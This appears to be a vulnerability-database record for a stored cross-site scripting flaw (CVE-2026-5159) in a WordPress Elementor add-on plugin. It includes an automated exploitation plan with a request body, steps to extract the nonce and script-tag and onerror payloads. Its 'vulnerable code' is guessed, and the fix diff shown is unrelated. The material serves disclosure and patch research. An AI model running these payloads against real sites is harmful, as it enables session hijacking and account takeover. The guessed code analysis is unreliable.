[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNrrzIyW5wKkMSNK7_-wxjd4YQ4kMXnn6CrlcrK0l4fA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5159","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-follow-button-text-parameter","Royal Addons for Elementor \u003C= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Follow Button Text' Parameter","The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:53:29","2026-05-05 03:37:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-5159\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to version 1.7.1056) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the Instagram Feed widget's processing of the `instagram_follow_text` setting. Due to missing input sanitization and output escaping, a user with Contributor-level access or higher can inject arbitrary scripts into a page via the Elementor editor. These scripts execute when any user views the affected page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (via Elementor's `elementor_ajax` action).\n- **Vulnerable Parameter:** `instagram_follow_text` within the widget settings JSON.\n- **Authentication Level:** Contributor+.\n- **Precondition:** An Administrator must have previously configured a valid-looking Instagram Access Token in the plugin's settings (usually stored in `wp_options` as something like `wpr_instagram_access_token` or configured in the widget settings).\n- **Payload:** `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` or an admin-account-takeover payload.\n\n## 3. Code Flow\n1.  **Entry Point:** An authenticated Contributor user opens a post in the Elementor Editor.\n2.  **Input:** The user adds the `wpr-instagram-feed` widget to the page and modifies the \"Follow Button Text\" (`instagram_follow_text`) setting.\n3.  **Data Storage:** When the user clicks \"Update\" in Elementor, a `POST` request is sent to `admin-ajax.php` with the action `elementor_ajax`. The command `editor_post_save` is used. Elementor saves the widget settings as a JSON blob in the `_elementor_data` post meta.\n4.  **Widget Rendering:** The plugin registers the widget in `assets\u002Fjs\u002Ffrontend.js` as `wpr-instagram-feed.default`.\n5.  **Sink:** In the PHP `render()` method of the Instagram Feed widget (likely located in `modules\u002Finstagram-feed\u002Fwidgets\u002Fwpr-instagram-feed.php`), the code retrieves the setting:\n    ```php\n    $settings = $this->get_settings_for_display();\n    \u002F\u002F ... logic to check for instagram access token ...\n    if ( ! empty( $settings['instagram_follow_text'] ) ) {\n        echo '\u003Cspan class=\"wpr-instagram-follow-text\">' . $settings['instagram_follow_text'] . '\u003C\u002Fspan>'; \u002F\u002F VULNERABLE SINK\n    }\n    ```\n6.  **Execution:** The unescaped HTML\u002FJS is rendered into the public-facing page.\n\n## 4. Nonce Acquisition Strategy\nTo save data in Elementor as a Contributor, we need the `elementor_ajax` nonce.\n\n1.  **Create a Page:** Use WP-CLI to create a page and enable Elementor for it.\n2.  **Access Editor:** Navigate to the Elementor editor URL for that page: `\u002Fwp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n3.  **Extract Nonce:** The Elementor configuration object is stored in the global JavaScript variable `elementorCommon`.\n    - Use `browser_eval` to extract the nonce: `browser_eval(\"elementorCommon.config.ajax.nonce\")`.\n4.  **Alternative:** The nonce can often be found in the localized script `elementor-editor-js-extra` under the key `nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Pre-configuration (Admin)\nEnsure the Instagram widget is \"active\" by simulating a valid token configuration.\n```bash\nwp option update wpr_instagram_access_token \"FAKE_TOKEN_12345\"\n```\n\n### Step 2: Create Target Page (Contributor)\n```bash\nwp post create --post_type=page --post_title=\"XSS Page\" --post_status=publish --post_author=[CONTRIBUTOR_ID]\n# Get the Post ID\n```\n\n### Step 3: Extract Elementor Nonce\nNavigate to the Elementor editor as the Contributor and run:\n`browser_eval(\"window.elementorConfig?.ajax?.nonce || elementorCommon.config.ajax.nonce\")`\n\n### Step 4: Submit Malicious Widget Data\nPerform a `POST` request to `wp-admin\u002Fadmin-ajax.php` using the `http_request` tool.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php?action=elementor_ajax`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```urlencoded\nactions={\"editor_post_save\":{\"action\":\"editor_post_save\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"[GENERATE_ID]\",\"elType\":\"widget\",\"widgetType\":\"wpr-instagram-feed\",\"settings\":{\"instagram_follow_text\":\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\"instagram_access_token\":\"FAKE_TOKEN\"}}]}]}]}}}&_nonce=[EXTRACTED_NONCE]&post_id=[POST_ID]\n```\n\n### Step 5: Trigger XSS\nNavigate to the permalink of the created page: `http:\u002F\u002F[target]\u002F?p=[POST_ID]`.\n\n## 6. Test Data Setup\n1.  **User:** Contributor user.\n2.  **Plugin Settings:** The Instagram Feed widget must be enabled. Since version 1.7.1056 is targeted, ensure it is installed and the `wpr_instagram_access_token` is set in the database (or the widget-level setting is used).\n3.  **Elementor:** Elementor must be active and the created page must be edited with Elementor.\n\n## 7. Expected Results\n- The AJAX response should return `{\"success\":true,...}`.\n- Upon viewing the page, an alert box with the site's domain should appear.\n- Viewing the HTML source of the page should show:\n  `\u003Cspan class=\"wpr-instagram-follow-text\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fspan>`\n\n## 8. Verification Steps\n1.  **Verify DB Storage:**\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Check if the JSON contains the string `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2.  **Confirm Execution:** Use `browser_navigate` to the page and check for the presence of the alert or the script tag in the DOM.\n\n## 9. Alternative Approaches\n- **If `editor_post_save` fails:** Try using the standard `save_post` hook if Royal Addons provides a standalone settings page for Instagram feeds that accepts `instagram_follow_text`.\n- **Payload variations:** If `\u003Cscript>` is blocked by a basic WAF, use `img` tags with `onerror`:\n  `\u003Cimg src=x onerror=alert(1)>`\n- **Dependency check:** If the feed doesn't render because the \"token\" is invalid, try to find a widget template that renders the follow button regardless of the feed loading status (e.g., if \"Show Follow Button\" is enabled in settings). Look for the control name `instagram_show_follow` in the widget settings.","The Royal Addons for Elementor plugin is vulnerable to Authenticated Stored Cross-Site Scripting via the 'instagram_follow_text' parameter in the Instagram Feed widget. This allows attackers with Contributor-level access or higher to inject malicious scripts that execute in the context of any user viewing the page, provided a valid Instagram access token has been configured.","\u002F\u002F modules\u002Finstagram-feed\u002Fwidgets\u002Fwpr-instagram-feed.php\n\n$settings = $this->get_settings_for_display();\n\u002F\u002F ... logic to check for instagram access token ...\nif ( ! empty( $settings['instagram_follow_text'] ) ) {\n    echo '\u003Cspan class=\"wpr-instagram-follow-text\">' . $settings['instagram_follow_text'] . '\u003C\u002Fspan>'; \u002F\u002F VULNERABLE SINK\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n     register_setting('wpr-extension-settings', 'wpr-custom-css');\n     register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+    register_setting('wpr-extension-settings', 'wpr-equal-height');\n+    \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n     register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n     \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n                     } elseif ( 'wpr-display-conditions' === $option_name ) {\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+                    } elseif ( 'wpr-column-slider' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+                    } elseif ( 'wpr-equal-height' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n                     }\n \n                     \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Froyal-elementor-addons.com\u002Felementor-particle-effects\u002F?ref=rea-plugin-backend-extentions-prev\">'. esc_html('View Extension Demo', 'wpr-addons') .'\u003C\u002Fa>';\n... (truncated)","1. Login to the WordPress dashboard with at least Contributor-level permissions.\n2. Create or edit a post\u002Fpage and launch the Elementor Editor.\n3. Add the 'Royal Instagram Feed' widget to the page layout.\n4. In the widget's Content settings, find the 'Follow Button' section and locate the 'Follow Button Text' field (internally `instagram_follow_text`).\n5. Enter a malicious script payload, such as \u003Cscript>alert(document.domain)\u003C\u002Fscript>, into this field.\n6. Save or Update the page to store the payload in the post's Elementor metadata.\n7. View the published page as any user. Provided a valid Instagram Access Token has been configured in the plugin settings (a required precondition for the widget to render), the unescaped script will execute in the browser.","gemini-3-flash-preview","2026-05-04 16:42:06","2026-05-04 16:42:26",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]